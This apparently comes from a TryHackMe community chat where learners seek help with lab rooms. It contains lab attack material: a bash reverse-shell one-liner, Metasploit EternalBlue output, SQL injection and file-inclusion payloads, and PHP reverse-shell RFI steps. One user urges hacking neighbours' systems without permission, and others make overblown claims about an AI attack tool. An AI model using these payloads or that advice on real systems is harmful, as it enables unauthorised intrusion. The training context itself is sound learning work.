is it the attackbox ip or is the ip of the site
but wait -u is for the host
i just remembered i forgot to turn on the vm at the start
Anyone else having issues with Windows Privilege Escalation > Task 6? The walkthrough states that the provided login should have SeBackupPrivilege but it does not.
C:\Users\THMBackup>whoami
wprivesc2\thmbackup
C:\Users\THMBackup>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
nvm.. had to right click cmd.exe and run as admin. was running cmd.exe through start > run > cmd.exe 
Hi, Im in the file inclusion module task 8 question 3, how does the hint know this uses the $_REQUEST method how did it get that information?
also thanks in advance
As an attacker doing a black box test, you would not know this. You'd just have to guess, based on responses you are getting from the web app. The hint knows because the room creators know the source code of the PHP web app that they are using.
Have you managed to resolve it? I'm stuck on same step
EDIT: Ok, I was able to resolve it
what kind of clues would lead me to that conclusion? im still lost on that
- https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion
- https://github.com/OWASP/www-project-web-security-testing-guide/blob/master/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_File_Inclusion.md#testing-for-remote-file-inclusion
It is probably down to: understanding a bit of PHP, common ways that (old) web apps were (are) coded and common mistakes that developers make which lead to security holes.
Not sanitizing $_GET is one and I think $_REQUEST is less common but looks like it gets mentioned in some places. There are also automated tools that will try many of the common "tricks". Finding a parameter like ?file=something is a good indicator to look more closely.
yea, it seems very strict on the order of clicking the provided links -- can't access the avatars from the same link used to create the account. a bit of an odd workflow
I have no idea how to give rep +1 but assume I did
can anyone help me with attack box
Hey peepz, need help
Stuck on Intro to Cross-Site Scripting
Every task was great until last one, netcat is listening but no matter how long i wait i get no incoming requests. Yes, im using attack box, yes payload has correct ip and port as well as nc does
The cheat sheet link in command injection room doesn't work anymore
Yeah, I've reported this via the feedback form. Use web.archive or Google any different one. Personally I just used web.archive - https://web.archive.org/web/20251112071014/https://github.com/payloadbox/command-injection-payload-list
Hi, I'm currently stuck on the LFI/RFI lab. I'm trying to achieve RCE by hosting a PHP shell and providing the HTTP link to the vulnerable parameter. I've tried using python3 -m http.server, but it isn't working. Could someone explain the correct way to make my local file accessible to the target machine? Do I need to use a specific IP or interface?
try python -m http.server instead
ok thanks
Gave +1 Rep to @versed snow (current: #1039 - 6)
and if it still doesn't work, send us screenshot or text of the error
Also, if you are on your own machine, try using the attack box, sometimes it's config problems
I was stuck in that room for two days, turns out I was using my own machine, when I switched to the attack box it instantly worked
Just finished that part. I think there's an issue with the question tbh. I put the right answer just to move on, but theoretically it doesn't seem right
Hi everyone,
I've completed the TryHackMe Pentester path and I'd like to know what the next logical step is to keep practicing in a structured way.
Should I focus first on specific rooms/modules (Active Directory, Web exploitation, privilege escalation),
My goal is to practice realistically, reinforce fundamentals, and progressively move toward real-world pentesting scenarios.
Thanks in advance for your guidance
Do it again and again
thanks, is there any challenges or walkthroughs that could be done ? thanks
Gave +1 Rep to @paper gale (current: #3539 - 1)
bro It's very difficult to advise you single thing but you need to something real like penetrate of your friends or some neighbor systems do all the stuff with your own systems or your college servers if you have permission if you don't then do it for just "educational" purposes only.
Hello everyone well this is just something I want to do actually soo basically I want to have a group of both newbies and experienced people in the world of cybersecurity mainly red teaming and penetration testing so we can all learn together and build ourselves. I know some might have some contradictory opinions but it's just what I think works. Soo anyone interested?
yes interested !
i just finished it without any problems ig u had a mistake on the hostname command file (the php one) , and about the challenges i didn't do them cause i heard i gotta learn burp suite first
I am !
anyone know how to access linux terminal from Windows?
yes
and also guide me about how to transfer files between Windows and kali
Would depend on your scenario
also any really experienced dudes wanna join
Yoo sure
yes
Pentest+ resources and timeline?
Gave +1 Rep to @jagged river (current: #147 - 70)
Yh
I could like to join
That sound awesome, but I don't know if I'm ready yet. I'm still going through the learning paths and haven't done any capture the flags yet
no problem hit me up if ur comfortable joining
what time zone are you guys in. I'm in Eastern
Hola guys I need vps/vpn. Any spare one
you mean an image?
linux privilege escalation - task 6
tried nano to get as shown below but not able to get root
any solutions i even tried with my attacker box and as well as , restarted machine many times no luck could someone help on this
?
used this one
did you get it to work?
and did you find the answer to the first question in task 6?
I'm interested
I'm interested too
Hello.
Does this path leave a free certification at the end?
no the certificates are paid
is there a certification of completion?
i think you get an image that you can use, but I havent' completed it yet so i don't know
After finishing the course, I still feel at a loss about how to tackle certain things.
Probably go do some challenges, the easy ones are quite fun and when you get stuck you can use a tutorial to see what you are supposed to do next
Hi everybody,
Today is a good day for me. For once, I was able to get all the flags smoothly (File Inclusion, Task 8, the challenge) without having to dig a lot through the web, and it didn't seem very difficult to me (whereas in challenges there is usually a step where I struggle), so I guess I'm finally getting a bit better (or at least maybe I suck a bit less).
Anyway, my question is: for Flag3, $_REQUEST is mentioned, but I didn't need it, with just the (SPOILER) ||null byte|| I was fine. Am I missing something here? I have the feeling that the room was trying to show me something with $_REQUEST but I don't know what. Any idea? And is it important?
Also, for the RCE in Lab #Playground, it was surprisingly easy, (SPOILER) ||I just took the first random PHP reverse shell from revshells.com|| and it worked just fine. I was just wondering if ||there is some kind of "super shell" that is more stable and that you'd recommend rather than revshells.com's shells?||
i think you can stabilise your shell somehow to make it more user friendly and make it so ctrl + c doesn't throw you out, im not sure how to do it but there definitely is a way
Oh ok, that would be great. The Ctrl + C issue can quickly become very annoying I think. In the meantime I'll see if I can find something myself.
Oh and also, the $_REQUEST was referring to the fact that it was made out of $_POST $_GET and $_COOKIE that's what i understood from it
Because i think in one of the tasks the $_GET didn't work and you had to use the $_POST instead as i remember
There's a room about shells, including netcat stabilisation: https://tryhackme.com/room/introtoshells
it's just further down the jr. pentester path
I had an interview and the task was to find the 5 most critical vulnerabilities on a domain (e.g. google.com). What are the steps to do that for a jr position? Ty
you sound like you just came here and think you can hack google in 5 seconds
spoiler
||you aint hacking google in 5 seconds||
Hi, thanks. Indeed, I had seen it before, and since it's in the Jr Pentester path, I intended to simply wait until I reach it.
Gave +1 Rep to @versed snow (current: #375 - 23)
I'm trying the sql injection room
And I try this :
https://website.thm/analytics?referrer=referrer=admin123' UNION SELECT SLEEP(5),2 where username like 'adsin%
but why is this given me ok and a short time ?
Is this issue occurring from my side ??
go to: ----> manage account (settings) -----> vm and vpn settings -------> VM region and set it to europe ireland or US East depending which one is closer to you
Anyone who can help me with the problem I posted yesterday ??
which task is it?
sql injection - task 8
anyone with clues on finding flags in
:Viewing The Page Source (walking an application)
msf exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.1.26:4444
[*] 10.66.129.103:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.66.129.103:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.66.129.103:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.66.129.103:445 - The target is vulnerable.
[*] 10.66.129.103:445 - Connecting to target for exploitation.
[+] 10.66.129.103:445 - Connection established for exploitation.
[+] 10.66.129.103:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.66.129.103:445 - CORE raw buffer dump (42 bytes)
[*] 10.66.129.103:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.66.129.103:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.66.129.103:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.66.129.103:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.66.129.103:445 - Trying exploit with 12 Groom Allocations.
[*] 10.66.129.103:445 - Sending all but last fragment of exploit packet
[*] 10.66.129.103:445 - Starting non-paged pool grooming
[+] 10.66.129.103:445 - Sending SMBv2 buffers
[+] 10.66.129.103:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.66.129.103:445 - Sending final SMBv2 buffers.
[*] 10.66.129.103:445 - Sending last fragment of exploit packet!
[*] 10.66.129.103:445 - Receiving response from exploit packet
[+] 10.66.129.103:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.66.129.103:445 - Sending egg to corrupted connection.
[*] 10.66.129.103:445 - Triggering free of corrupted buffer.
dir
[-] 10.66.129.103:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.66.129.103:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.66.129.103:445
why its failing...
maybe check options again?
in a meaning which one is better?
yeah
I only know kali linux so i can't really say which one is better
is it good for red teaming?
Can someone tell me why is it that WormGPT is highly not preferred for bug bounty and while black hats use it most of the time a single attack from that thing can shutdown companies so how do companies stop such attacks
What's wormGPT
An ai that can do automated attacks it can learn and adapt so basically the more it attacks no matter if it succeed or not it will learn and improve so basically it's a nuclear bomb
sounds like something an ai lover would say
That's funny coming from you
what do you mean by that?
Nothing 
i'm just saying that i don't believe ai's can be that good as you say
It's true if you don't believe search for yourself the thing was shutdown from the eyes of the public it can do even more
People probably don't use ai's to do bug bounty because it learnt from things that already happened and in bug bounty you are meant to find new ones + ai's in my opinion are unreliable
True, I won't argue with that but it depends on how you made the ai view the work
Yeah, probably it's very lightweight it got most of the tools, exploitdb installed in it, and i honestly like its look
Have you any knowledge of it, or have you carried out an attack with it before
Hey, I am finally on the intermediate-level rooms, and I am proud of myself. However, I do need to do more challenges.
Can you give me link to download debian 12 iso please.
I am in the File Inclusion room (first intermediate room), and I am having some trouble with trying to figure out the challenge answers even though I have done all the previous questions along with looking at walkthroughs for the room. I just want to be able to do it on my own, so I decided to not just ctrl+c ctrl+v the answers :3
I did but it costed me $2000 find
Hi guys !
I pass the eJPT this weekend, which room or challenge i have to focus to ensure a success ?
Thanks !
2000$?! that's at least 64 GB of ram
At least learnt something useful?
Yes I will never use overpowered ai
Congrats you are smarter than 99% of investors these days
anyone here good at doing RFI attacks? im confused on the RFI challenge in the jr pentester path
Hello everyone, i'm stuck on Challenge 3 of File Inclusion module.
I've tried using cookies,POST,GET with this payload: ../../../../etc/flag3%00 but it just doesn't work, may anyone help?
Edit the url itself
Add the %00 to the url
Hello
I'm looking for someone skilled in reverse engineering, I'm paying good money
i just finished authentication bypass room, where i can practice it if anyone know
specially logic flaw and cookie tampering
Hi! I'm looking for three people to join a small CTF team. I'd prefer if you're 15 or younger and live in a time zone that's at most ±2 hours from Finland (UTC+0, UTC+1, UTC+2 or UTC+3). The goal isn't to jump into competitions right away - first we'd get to know each other, practice together, and build a good team dynamic. I'm a beginner and want to improve step by step toward intermediate-level CTFs. If you're interested in learning and practicing together, feel free to message me!
Why does this feel like a lure 
Because it probably is
What's the avg time ppl take to complete jr penetration path
It depends how much time you can allocate to it, your background and how fast you absorb knowledge. It's tricky to compare it with other folks.
Currently working through the Jr. Pen Tester path and had a few questions: 1. When a device on one subnet wants to ping a device, I understand that the device must first send an ARP request in order to populate its ARP table with the MAC address/IP address. What about when the device I want to ping is on a different subnet than my device? I can't use ARP since it doesn't go past routers. Does the router then send a broadcast to the other subnet trying to reach the correct endpoint?
Very good question. Your device will "wrap" that ICMP packet with destination IP inside into an Ethernet frame that it will send to your default gateway (router). Router will find destination subnet based on that IP from "wrapped" ICMP packet and send request to the default gateway of that subnet. Default gateway of the targeted subnet will then perform ARP request on the targeted subnet and return response to your gateway, which will forward that response back to your device.
Why is nmap able to detect what OS a machine is running without a full TCP connection, but not what versions are running on each port?
Hi everyone. I am stuck on task 4 of File Inclusion.
What do you mean - nmap cannot detect the service running on each port?
A full TCP connection is established through a three-way handshake: SYN - SYN/ACK - ACK. When using the stealth scan (-sS), Nmap prevents the connection from being fully established by not sending the final ACK (instead, it usually sends an RST).
Nmap can still perform OS detection at this stage by analyzing the characteristics of the SYN/ACK response. Different operating systems have unique 'signatures' in their TCP/IP stack implementations, such as specific TTL (Time to Live) and Window Size values.
However, service version detection (-sV) works at the application layer. To identify a version, Nmap needs to exchange data with the service (like a banner grab or a specific probe). This interaction requires a full TCP connection to be established first so that application-layer data can be transmitted.
Starting jr penetration testing, ready to give 4-5 hrs daily, how much time will I need to complete it
You can use learning scheduler to estimate completing time.
I'm struggling with Windows Privilege Escalation room, task 6. I constantly get disconnected from machine after a while or I have following error when trying to connect through xfreerdp3. Already tried changing VPN region.
[17:40:21:510] [58580:0000e4d6] [ERROR][com.freerdp.core] - [freerdp_tcp_default_connect]: Couldn't get socket ip address
Anyone is having similar issues?
When using Remmina I also get disconnected
[17:46:11:316] [61650:0000f0d4] [ERROR][com.freerdp.core.transport] - [transport_read_layer]: BIO_read returned a system error 104: Connection reset by peer
[17:46:11:316] [61650:0000f0d4] [ERROR][com.freerdp.core] - [transport_read_layer]: ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[17:46:11:316] [61650:0000f0d4] [INFO][com.freerdp.client.common] - [client_auto_reconnect_ex]: Network disconnect!
I guess something either with the machine in the task or AWS issues
Yea, same in other task :/ meh
There is a bug I think on Nmap basic port scans (premium room) in task 5: when I perform 'nmap -sS <Machine_IP>' I'm supposed to receive an open port with 4 digits and I'm not receiving this kind, and I'm executing the same command as needed.
Are you scanning the right machine?
Since task 4,5,6 have their own machine
How would I determine what my Auth Username and password is ?
Hello,
I'm stuck at the vulnerability room
I use 50477 as shell but whatever I do I see this :
root@ip-10-80-95-16:~# python3 50477.py -u http://10.80.181.232
[+]Connecting...
Enter Command $ls
system
Enter Command $
What can I do to come further in this room ?
Did you try to enumerate it? What OS version is it running? What are the folder contents? Did you try and see if you can get a reverse shell?
I only run the exploit found with searchsploit
and I tried this :
Enter Command $bash -c 'bash -i >& /dev/tcp/10.80.95.16/4444 0>&1'
But no answer back
Have you tried other reverse shell payloads?
I try the bash ones and it if those doesn't work, I try to python ones
no bash ones to find
fuel CMS 1.4.1 - Remote Code Execution (1) | linux/webapps/47138.py
Fuel CMS 1.4.1 - Remote Code Execution (2) | php/webapps/49487.rb
Fuel CMS 1.4.1 - Remote Code Execution (3) | php/webapps/50477.py
Fuel CMS 1.4.13 - 'col' Blind SQL Injection ( | php/webapps/50523.txt
Fuel CMS 1.4.7 - 'col' SQL Injection (Authent | php/webapps/48741.txt
Fuel CMS 1.4.8 - 'fuel_replace_id' SQL Inject | php/webapps/48778.txt
No, I meant using the same exploit, but using other reverse shell payloads for an interactive shell.
oke, then I have to think how I can use other reverse shells for that
Hi, try a mkfifo one
I will
You can choose from the ones in revshells.com, payloadsallthethings and there is a newer platform which I can't remember off the top of my head
Thanks
I did over look... "start attack" opens a new intruder attack window in background, working within a tight screen environment - found it! Disregard product warning when initiating attack, as it appears to be for information only.
Did you solve it?
The syntax of php in the python code is an old one. You have to edit the exploit file to adapt to the new php version
I did solve it but with the exploit given as a way you could not solve it
Hey everyone, I'm working on a Level 3 SQLi lab and I've hit a wall with a server-side filter.
The Setup: I've bypassed the front-end JS and I'm using 'Edit and Resubmit' in the Network tab to hit the id parameter directly. The server returns 'Dangerous Command' for almost everything. I've tried:
Standard UNION SELECT (with case folding/comments)
Boolean logic like 1' AND 1=1--
URL/Hex encoding the keywords.
I also noticed a csrftoken and dual sessionid cookies (one for / and one for /level3).
Is this a Blind SQLi case where I need to bypass space/keyword filtering using alternative whitespace characters, or should I be looking at a different vector (like the Cookies or CSRF token) because the id param is a honey-pot? Not looking for the flag, just a nudge on the filter logic!
Hi guys,
I'm stuck on windows privilege escalation room- task 6. I'm not able to start a smbserver with impacket with the same commands from the task:
Any help would be appreciated:)
It says OSError: Errno 98 Address already in use
Are you using the Attackbox or your own VM?
Hello,
I'm stuck at the Upload Vulnerabilities room. The intro of the room tells us to edit the /etc/hosts file since the room is using virtual hosting. I followed the steps exactly, still for some reason I can't access the website for the practical of the room.
If anyone else has already encountered this or has a solution pls DM or reply.
what should i do after finishing jr pentester path? do i start solving challenges so i can hone my skills? if so what challenges should i start solving?
Maybe start with easy and medium rated challenge rooms to get a feel of how to apply what you've learned.
is there a specific way i should be solving them?
I don't think there should be, but more of finding a methodology that works for you.. from information gathering, exploitation, post-compromise, etc.
okay thank you
Hello guys. Please, I am having trouble with this room: Intro to SSRF. I have done the task, I am unable to get the flag.
Please help if you can.
right click radio button of any image and click inspect then set the value as x/../private then click that radio button and update profile picture with you'll see empty profile picture then right click the empty profile picture and press view page source
Okay thank you for your response. lemme do it.
Gave +1 Rep to @distant plinth (current: #3698 - 1)
when you say an empty profile picture, do you mean a picture with no radio button or what do you mean by empty profile please?
when you update your profile picture it reflects above profile pictures to show you which profile picture you currently have what i mean by empty is when you set the value to something else so no profile picture will appear there
i believe you can type the room name followed by tryhackme on youtube and you'll find videos about ppl doing the room so that can help you
appreciate.
glad i was able to help also make sure not to include machine ip addresses in screenshots i think it's safer that way
Gm guys
gm gm
are you on jr pentester path or veteran you're in cybersecurity ?
❤️
I am a cybersecurity student in my 4th year
@barren matrix send me a friend request
Oh great nvm which country ?
Nigeria
Hi
oh great so which topics do you have hands on practice or nah not yet
I am a great hacker way above my peers, I can hack websites, hack Windows and Linux systems, hack CCTV, hack mobile phones create spyware and malware
Which is youre main domain ?
osint
pwn rev or wot
Main domain??
Core Focus In which domain I meant by job or focus
Example osint , pwn ,rev , malware dev etc
WoT, osint
, malware
Good
What about you?
which distro youre using btw ?
vuln researching
Kali
good
You have anything on GitHub?
Let's partnership me you in your dm
I keep my things private hosted Kinda Im running A team so
Ohh okayy
dm
hey, there is a dead link in this room : https://tryhackme.com/room/oscommandinjection task 5, the cheat sheet goes to a non-existent repo
Can you suggest me wifi adapter for injection please
guys i am confused when im trying to gain root access after finding the setImpersonator is enabled
yes it is heres the wayback result for that cheat sheet
Hi guys, I'm currently doing the "Vulnerabilities 101" room. In task number 4, they ask: "Using NVD, how many CVEs were published in July 2021?" I've searched and found that the answer is 1,585, but THM says that's incorrect. Why?
Have you filtered out the rejected ones? If you look at the Advanced Options you should be able to see it.
Gm guys
thank you
Gave +1 Rep to @prisma raptor (current: #11 - 937)
For pen testing lab should i set up kali on my main pc in a vm or on vm on proxmox server?
Kali in a VM would be good as you can just take snapshots and don't have to build from scratch if something happens
Thank you
Gave +1 Rep to @prisma raptor (current: #11 - 941)
Hey everyone , can you help me in RCE task ? How we can execute the attack please
Which room and task number are you on?
File inclusion room task 8 the last one
What you have is an RFI (remote file inclusion) vulnerability. You can enter link to your php reverse shell to gain RCE. Just host it locally or in the attackbox with python http.server
I understand the main idea but i dont know where php file should be created and the server to implement the attack
- Use the shell here https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php, create one locally and change the ip and port values
- start http server locally with python -m http.server $PORT (different from port in step 1.)
- start nc listener for the reverse shell, and try to access your shell from the site
Hi, does anyone have a summary of the commands, organized by topic, for the entire learning path? I finished it but didn't take notes.
Thanks will try this steps
Gave +1 Rep to @stiff oxide (current: #1834 - 3)
Hey everyone, I'm new here
I just started the junior pentester path ,
Any advice on what I should focus on first?
what's industry best practice? I run a Mac, should my pen testing be done directly on my machine or should I run something like Kali in VM?
I am learning networking & WiFi security, can someone guide beginner resources?
Nah, you should try to complete it first. All the knowledge is necessary. Then you should practice with easy to medium challenges.
I deleted my post, because I just realized that I didn't go through enough.. I found the real flags 
Hi, does anyone have a summary of the commands, organized by topic, for the entire learning path? I finished it but didn't take notes.
Notion, Obsidian, google docs, word, txt, etc
HI
anyone facing issues - where the machine ip address doesn't appear even after starting the attackbox in exercises ?
Also, as there are lot of tools being discussed, are we expected to remember all of them for the certification examination ?
+1
i was considering creating a bootable kali linux
vm is ok generally ?
@hybrid quest yeah. may be try this link to make the bootable - https://www.youtube.com/watch?v=kMnKzBJ4ZHE
i will be doing this tomorrow and can update how did i go with it
I ended up using UTM on my Mac. Works well
@mint pilot i am using virtualbox but seems very slow ? would you reckon UTM is faster ?
anyone doing any projects to put on github while doing this course. ? any ideas ?
use qemu its faster than oracle virtual box
and smooth
@barren matrix thanks mate - are you working on any project as well while doing this course ?
Gave +1 Rep to @barren matrix (current: #3754 - 1)
Rn Nupe i usually checkout here if anyone stucked
So I'm already working professional
how to download qemu
i was at 96% lol, I won't have the pleasure of finishing this path 😭
i'm at 20% now
I was feeling bad that I was not doing too many modules this week
not anymore
The OWASP10 module is still missing A10
however, the beginner challenges module looks good
yes, it is on the path now
in the second room
I was at 33% complete and I'm now 3%
There seems to be way more content in the pathway now...
@gentle bridge Hi
way more content now
i think it was around 30 hours to complete it before
now it's 90
The revamp is actually awesome
when they did same with presecurity it triggered me i didn't want to finish it again
Is the old jr pentest certificate of completion erased then ?
For the people that have already done it before
I have been following SEC1 but so confusing. like try many tools for just introduction. and now I jumped to jr.pentest better. anyone relate?
i did jr pentest directly because the other ones were just intro, and the intro is also present again in jr pentest so you are missing out on nothing
Owasp top shit
I was at 99% completion on the old track and just got reset to 0% with this new path. Feels bad.
Just had to finish up with windows privesc
I think there's an error in the first room Guided Pentest: Web for Task 6 the flag you need to use this following command which does not work
If I start the attackbox nothing happens there but if I start the Target Machine both IPs get filled
yes that looks wrong
the first IP should be the target machine and the second ip the attacker machine
Accessing the webshell on the target machine and connecting to the attacker machine
ye
thought i go stupid ^^
I can post it in bug report but thought as its new room raffle etc someone might wanna check it out right away lol
Is anyone having an issue with the raffle tickets not being awarded after restarting labs that had already been done? Just want to check before logging a bug report if its a known issue
Hey everyone, we have made the Proxy challenge room private for the time being, so we can get it fixed properly.
Hello in the Penetration Testing Frameworks room on task 9 the last question is broken or not ??
I think i answer correct and i cannot submit it
:/
??
Look in the introduction section if you have not
Oh thanks hahaha
Gave +1 Rep to @elder leaf (current: #1504 - 4)
with the rooms that provide tickets but previously I already had them solved how can I get the tickets
Please check again, should be fixed
Yeah looks good now : )
i had previously completed jr pentester module but after revamp do i need to re-do it again?
Need to? Nope
Should you? Absolutely
thank you
~~hey, sorry if this sounds stupid ~~
im on task 6 of guided pentest: web (remote code execution), and im not quite sure how to create the web shell? any help/tips would be appreciated
-# sorry if this is the wrong channel as well
nevermind, seems i have figured it out 
Yeah, this question was annoying, I knew what the answer should be but because that section referred to the MASTG as the MSTG I just couldn't process it
Maybe I'm overlooking something - doing the passive reconnaissance room right now, section 5 "DNSDumpster" - the question is to look up tryhackme.com on DNSDumpster and name one additional subdomain next to www and blog that sounds interesting and has 6 letters. However, the correct answer (||remote||) is not even listed for me on DNSDumpster. What was I doing wrong?
Hi guys. I'm still quite new to all of this but I'm intrested in red teaming and pen testing as a friend I have inspired me into it.
Ive completed the pre security path and started the path after that while also doing some of the challenges
Thing is, because I have no idea what I'm actually doing, I keep watching walkthroughs and following along to them while taking notes rather than completing them myself or at least trying to.
Does anyone have a few modules they would recommend I jump to so I can start attempting some of these challenges myself so I don't have to copy a walkthrough anymore?
Just give up
real lol
Which path are you doing right now, the cybersecurity 101 one? Or do you mean that you're walkthroughs of CTFs?
I always read the explanations first and then play around with whatever tool is being introduced, just following up on the stuff that I didn't fully grasp or if other questions arise, googling it or asking LLMs
Working quite well with that for me
Yea cyber security 101 is the one I'm working through now. But while I'm doing that I also try doing some of the easy challenges but with each challenge I'm in the spot where all I can do is run a nmap scan and then promptly find a walkthrough to follow 🤣🤣
Peace be upon those who follow guidance.
What will happen with the ticketed rooms I had already completed before the event starting?
Reset a room you have already completed and complete it again. See if you now get the ticket.
Reset the room and complete it again. It worked with me
Thanks
hello i need a hint to solve Support room i got the password of login page user: specialadmin@support.thm password:snoopy
what next i do
Log in with the credentials
I login it is give theme option when I choose colour it change interface colour
change color think ||LFI||
Hello sir big fan I see your videos
Sir red, green, blue
This colour are available
has someone a hint for LFI in support room, I try now Intruder with a list of LFI's but no luck so far, IDOR btw I already found and exploited
now I got something
was nothing arr.
RFI url encoded doesnt work
just normal lfi like ||../api|| do no forget to check page source to see result
http://support.thm/api.php?skin=../../../../../../../etc/passwd thats not working, neither config or config.php or url encoded
with curl or burp
Hello sir I got flag but not get second one please help me if anyone got
Because I have some lag issue in my pc
@radiant bloom , @coarse pebble
I not have one flag because my LFI not working, I try bypass but still not working
So someone could enlighten me
how you are doing lfi?
http://support.thm/api.php?skin= with cookie Header over curl, and burp I tried as well, I tried bypass techniques
skin parse the php files green and includes it I guess
but only them every try to include others fail or better it happened nothing
no need to burp, you can even use your browser, test /dashboard.php?skin=../api
do not share flag on discord, delete the message
Sir can you please share 2 one at personal
Chat
Also you can give me hint so I can find
when you login as admin, check footer, new select drop down for data and time appear
thx for the hint
Date and time will set
found a password but it work not no admin or it loging...wtf
I tried also id_rsa over LFI, passwd, db
only config but this password doesn't works
I am solve this I am trying 2 hours but not getting when I try hard my pc get freezed
you mean your attack box
@coarse pebble hey, if I may ask,
I'm supposed to find a password inside a variable in a php file and use that to login yes? (It's not working)
Thank you for your time
Gave +1 Rep to @coarse pebble (current: #75 - 150)
Sir not understand last part for 2 flag when I tried to send response payload it not giving me response @coarse pebble
@manic kiln Hey congrats on flag1, how did you login as admin?
@coarse pebble finally I complete room support by my self only thank you for video but I use curl method
Gave +1 Rep to @coarse pebble (current: #75 - 151)
I started 7 pm to 2:56 am completely this room now I am at metasploit: scanning and exploitation
I just did DNSDumpster task in the Passive Recon Room the answer is not a subdomain listed on the website. Had to completely guess the answer.
it doesn't work with me
hmm? they fixed it. what you mean? ^^
hmmm, i will check now, it doesn't work with me in last hour
if you start both machines you should be able to copy paste command otherwise just check that first is target and 2nd IP is attackbox
it seems these new rooms have a password trick on them for whatever reason, like on Operation Promotion room. rabbit holes everywhere. I really do not like that. in this case that password you find does not work, correct password is same format, think remove 1 character from it, you can guess which one
hey guys - i was 30% done with the course and i opened after a week and the entire course is reset to 0% -. it says - The Jr Pentester Path just got rebuilt. Complete rooms, earn tickets, and win a free PT1 cert.. have they made the course all together new ?
Yeah I agree with you on that, giving a password hint to define a pattern/mask is a thing, and giving wrong passwords is something else.
Got it yesterday thanks for the response.
Gave +1 Rep to @coarse pebble (current: #74 - 152)
Yes, the route for reworked and it is much better now, the new rooms are relevant at this time and very good.
Keep working on it, Good luck.
any tips for me as i just started the jr pentest path. what do you guys actually do - take notes, repeat, do practice?
Personally I take notes when I go through the room, use either my own knowledge or my notes to answer the questions, if I can't use these to answer the questions I go back through and take more notes because I must've missed some key part in the paragraphs. If I've completed a topic like nmap for example I'll look at rooms related to that in particular and try complete these using my notes and knowledge then if needed I will research more and add to the notes as I go through the rooms
hey, the flag.txt in the directory enumeration intended ?? (in Guided Pentest: Web)
Guys, I am doing LLM pentesting. Anyone completed it? Please give a small hint to complete, I am stuck on the flag
Just give up
Hey everyone!
I'm working on the Time-Based Blind SQLi section of sqli room (task-9 challenge, level 4) and ran into something weird.
When I use a basic SLEEP payload it works fine and delays by 2 seconds:
?referrer=tryhackme.com' UNION SELECT SLEEP(2),1 ;--
But as soon as I add FROM information_schema.columns, it just loads forever (even without the where clause):
?referrer=tryhackme.com' UNION SELECT SLEEP(2),2 FROM information_schema.columns WHERE table_schema LIKE database() ;--
Could someone explain this to me? thanks
no, I restarted the machine and it worked, thanks
Gave +1 Rep to @glacial yew (current: #2454 - 2)
I'm a penetration tester specializing in authorized offensive security testing. I focus on finding real weaknesses in networks and applications, then giving clear, actionable reports so you can fix them fast.
I'm thorough, confidential, and only work with explicit permission.
What can I help you with?
The Blue Team Perspective -> splunk box give only a white screen can anybody help me?
guys I got an error: my target machine turns off again and again after some time
got splunk over browser and could solve the problem
🥳
Anyone able to point out what im missing with the last task of viewing the page source, I have followed the documentation and found the login page with default credentials, however it does not accept the flag
Read the docs a bit better, you can do one more thing that has nothing to do with credentials. I hope this helps you out!
Aw, I don't want to have to redo rooms for tickets
Ahhh thanks ❤️ figured it out
Gave +1 Rep to @old cargo
A ticket for premium, if you get 2 more you can redeem it
oh cool, a new path

hey, i think one of the flags for "walking an application" isnt working
oh im actually pepega af, you can reset if you did them already
Which task are you on?
Just starting this task myself
ah, there is a flag that will work, I'm assuming you found the one with the credentials?
yes
There is another
Yeah, I found it a bit odd as well
Why do I keep getting connection closed by Foreign Host in Jr pentester path, Protocols and Servers, multiple tasks.
Anyone can help me with the Net Sec room last challenge with the IDS?
What issue I having
Not an issue, just need a bit help with what should I scan specifically to get the flag?
I was the same unless I entered command relatively quickly
Also anyone got the email for who to contact for some of the prizes
Scan the machine as quietly as you can. You can get it with just one flag on ur scan
will it show on the web?
Just remember to reset before every scan. Like right before
Yeah the flag shows up on the website
Hey, on Authentication Bypass task 3 I have the .txt file and the terminal in the same directory, but it still says it can't find the file. Anyone know why this may be?
this has been a fun path so far
how long does the hydra for netsec challenge take?
Working on the directory listing flag, would this be a wget command?
agreed
if it's taking ages double check your command, it should spit it out in seconds if the command's perfect
yeah gave the wrong port
I done the same lol. Was raging at myself lol
i think all the good stuff is already claimed, me sad
meh, all i want is a 3 month voucher
or a trowback voucher, stuff to keep me learning for free lol
Not got it yet emailed em tho
oh i see
you will do fine, just learn
and if you want to drop this pass me the voucher keke 
Check which scp command ur using. Make sure its victim to u
Haha
https://tryhackme.com/room/tickets2 shows nothing claimed yet
On the Developer Tools - Network, the flag isnt being accepted... I found ||THM{HEADER_FLAG}||
@left flicker
||just figured it out, click through the section headings on the right side of the screen||
Thank you found it!
Gave +1 Rep to @undone mirage
they didnt update it, but pretty much everything is claimed
or im getting really unlucky with just freezes and 3$ swap for 4 rooms in a row
anyone help me with auth bypass task 3. I've got the wordlists both in the same directory that I'm running ffuf from and I'm not getting any users or passwords being output
no doubt me being a numpty
